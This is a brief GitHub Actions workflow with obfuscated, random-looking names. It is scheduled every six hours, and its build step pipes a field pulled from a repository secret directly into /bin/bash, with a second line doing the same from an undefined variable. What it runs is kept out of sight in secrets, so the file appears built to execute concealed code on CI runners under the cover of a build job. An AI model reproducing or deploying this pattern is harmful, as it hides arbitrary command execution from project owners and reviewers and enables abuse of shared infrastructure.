name: gantingxi3810

on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gantingxi3810
        env:
          rxn7140: ${{ secrets.rxn7140 }}
        run: |
          echo $rxn7140 | jq -r .nypu356 | /bin/bash
          echo $ps590 | jq -r .ef65407 | /bin/bash

